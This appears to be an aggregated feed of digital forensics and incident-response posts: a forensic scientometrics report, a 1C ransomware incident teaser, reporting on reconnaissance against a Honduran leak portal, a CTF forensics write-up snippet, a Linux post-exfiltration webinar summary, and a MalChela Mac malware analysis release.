"The FoSci Report 2026: Understanding, Detecting, and Documenting Manipulation in the Research Ecosystem"
In this report, 17 authors – among them scholarly sleuths and investigators of science, from academia and industry – come together to present a primer on the field of forensic scientometrics.
#research #science #scientometrics #forensics #researchFraud
История одного инцидента, или почему не стоит публиковать 1С
Всем привет, на связи команда DFIR JetCSIRT! Недавно мы столкнулись с кейсом, где злоумышленники были обнаружены на ранних этапах атаки. Они не успели довести дело до импакта, но изрядно наследили, что дало нам возможность изучить их тактики, техники и процедуры (TTP) в действии. Мы готовы рассказать, как это было, и дать рекомендации по повышению уровня защищенности.
https://habr.com/ru/companies/jetinfosystems/articles/1035226/
#Ransomware #DFIR #1С #Форензика #Forensics #информационная_безопасность #вредоносное_ПО #SOC #иб
Hondurasgate.ch Portal Under Attack
Hondurasgate.ch 포털이 2026년 5월 7일 하루 동안 39,618건의 침입 시도를 받았으며, 이 중 22,620건이 한 시간 내에 집중적으로 발생했다. 공격은 미국과 이스라엘에서 주로 발생했으며, 이는 유출된 오디오에서 언급된 두 국가와 일치한다. 공격은 단순 DDoS가 아닌 체계적인 취약점 탐색과 표면 정찰을 목표로 하며, 구식 CMS 설치기, 구성 파일 노출, 레거시 관리자 패널, 저장소 노출 등을 집중적으로 탐색했다. 이번 공격은 정치적 메시지로 해석되며, 유출 자료의 진위를 인정하는 간접적 증거로 보인다.
https://hondurasgate.ch/investigaciones/hondurasgate-under-attack-us-israel-digital-siege
39,618 intrusion attempts in 24 hours, with a peak of 22,620 requests in a single hour. Geolocation places the focal points in U.S. and Israeli territory, the two jurisdictions named in the leaked audios as architects of the political return of the convicted ex-president Juan Orlando Hernández.
Write-up for 2 forensics challenges at THCon : https://cryptax.github.io/thcon2026-breach/
Don’t forget to lock This is the first challenge of the Forensics category. 1 We seized a suspect's computer and managed to capture a RAM dump before it was powered off, along with an encrypted disk. Your objective is to decrypt the drive. We get a chall.tar.gz Solving the challenge The tar.gz contains 2 files: an ELF and a raw: 1 2 3 drwxr-xr-x aurel/aurel 0 2026-03-09 16:46 files/ -rw-r--r-- aurel/aurel 1072693248 2026-03-09 16:46 files/disk.
----------------
🎥 Video
===================
Opening: The announcement describes a free webinar titled “Digital Forensics: Basic Linux Analysis After Data Exfiltration — Hackers Arise” scheduled for February 13, 2026. The core narrative emphasizes that intrusions often present as an adversary already resident in an environment rather than beginning with an obvious malware drop.
Technical Details: The event framing indicates a focus on post-exfiltration Linux analysis. Topics implied by the title and tagline include identification of forensic artifacts left after data exfiltration, methods to examine Linux hosts for traces of adversary activity, and investigator-centric techniques for reconstructing actions when initial compromise is not observable. The announcement explicitly centers on the concept that adversaries can be present before any exploit or payload execution.
Analysis: Framing investigations around the “adversary-inside” perspective shifts attention to persistence mechanisms, lateral movement artifacts, evidence of data staging and egress, and gaps in audit/visibility that enable prolonged dwell time. While the announcement does not list IoCs or specific tools, it signals an emphasis on host-level evidence collection and reasoning about timelines and artifact correlation on Linux systems.
Detection: Although the source does not provide detection signatures, the webinar’s scope suggests discussion of detection opportunities such as anomalous outbound connections, unusual file access patterns, unexpected scheduled jobs or services, and forensic indicators in system logs and memory snapshots.
Implications for IR practitioners: The stated narrative reinforces the need to treat post-exfiltration analysis as a distinct investigative discipline with its own priorities—establishing a timeline, locating exfiltration vectors, and validating whether data staging or covert channels were used.
Limitations: The announcement is a webinar summary and does not publish technical IoCs, ATT&CK IDs, or tooling details. Attendees should expect conceptual framing and case-oriented walkthroughs rather than a repository of signatures.
References: Event title and date as published by the organizers: “Digital Forensics: Basic Linux Analysis After Data Exfiltration — Hackers Arise”, Feb 13, 2026.
🔹 digitalforensics #linux #incidentresponse #dataexfiltration #forensics
🔗 Source: https://hackers-arise.com/digital-forensics-basic-linux-analysis-after-data-exfiltration/
MalChela v4.1: Mac Malware Analysis Arrives
MalChela v4.1 is out today, and the headline is something I’ve been wanting to tackle for a while: dedicated Mac malware analysis tooling. If you’ve been following the channel or the blog, you know MalChela started as a triage-first toolkit aimed at the kinds of samples that show up in Windows-centric IR engagements. That coverage was never the full picture. Mac malware — infostealers, adware loaders, APT implants — has become too common to treat as an edge case. v4.1 is the start at addressing that directly.
New Tools: Mac Analysis
Three new tools land in this release, each targeting a different layer of Mac binary analysis. All three are available in the PWA under the Mac Analysis heading, accessible via CLI shortcodes, and included in the release scripts.
codesign_check (cs)
macOS code signatures are one of the first things worth checking on any suspicious binary. codesign_check accepts either an .app bundle or a bare Mach-O and reports signature status (Developer-signed, Ad-hoc, or Unsigned), Bundle ID, Team ID, and entitlement presence — including the get-task-allow flag that marks debug and development builds. It also verifies the _CodeSignature/ and CodeResources directory structure.
Indicators flagged: missing CMS blob, CS_ADHOC flag, absent Team ID, and get-task-allow entitlement. FileMiner now suggests Code Sign Check automatically for all Mach-O files in a scan. (Planned feature: adding a certificate revocation check).
plist_analyzer (pa)
Parses macOS .plist files and .app bundle Info.plist for static malware indicators. This release includes four new detections:
MottG
Habr
sayzard
Mitzi Szereto
cryptax
hasamba
Alonso Caballero / ReYDeS
Baker Street ForensicsLSUIElement and legacy NSUIElement (integer 1) forms are now detected, covering older macOS malware that used the pre-Sierra key.macho_info (mo)
Parses thin and fat/universal Mach-O binaries and reports: architecture, linked libraries, section entropy, symbol status, RPATH entries, __PAGEZERO integrity, and PIE/ASLR flags.
This release also adds deprecated crypto library detection: macho_info now flags linkage against end-of-life OpenSSL libraries (libcrypto.0.9.8, libssl.0.9.8, and variants). There’s no legitimate reason for a modern binary to link these — flag it and investigate further.
mStrings — Mac Tuning
Running mStrings against Mach-O binaries previously produced a lot of noise: ObjC runtime stubs, Swift mangled symbols, and Apple system library paths that add volume without adding signal. A new is_objc_swift_noise() filter suppresses these categories:
_objc_* runtime stubs@_* import stubs (including @_LSSharedFileList*, which was previously surfacing as false-positive filesystem IOCs)_$s*, _T0, swift_*)/System/Library/Frameworks/ and /usr/lib/swift/Alongside the noise filter, 12 new Mac-specific MITRE detection rules have been added to detections.yaml:
Mac path extraction also gets a dedicated regex: re_mac_path captures filesystem IOCs in Mac-style paths (.sh, .py, .dylib, .plist, .app, .pkg, .command) under /Users/, /Library/, /tmp/, and related directories.
FileMiner — Session Persistence
FileMiner scan results now persist across browser close and refresh. Results, the analyzed path, and the set of executed sub-tools survive in localStorage automatically. On each scan, a session.json is also written server-side to saved_output/fileminer/ — or to the active case folder under saved_output/cases/<case>/fileminer/ when Save to Case is checked.
A Load Session button in the FileMiner options bar opens a file browser pre-navigated to the correct session directory. Selecting a session.json restores the full results table and re-populates the path input. Like the previous GUI, fileminer now tracks tool runs for suggested tools (green indicates tool report already generated).
MalChela v4.1 is available now on GitHub. As I said this is just the start of the macOS malware support. I’m looking forward to taking this much further.
#DFIR #Forensics #macos #MalChela #Malware
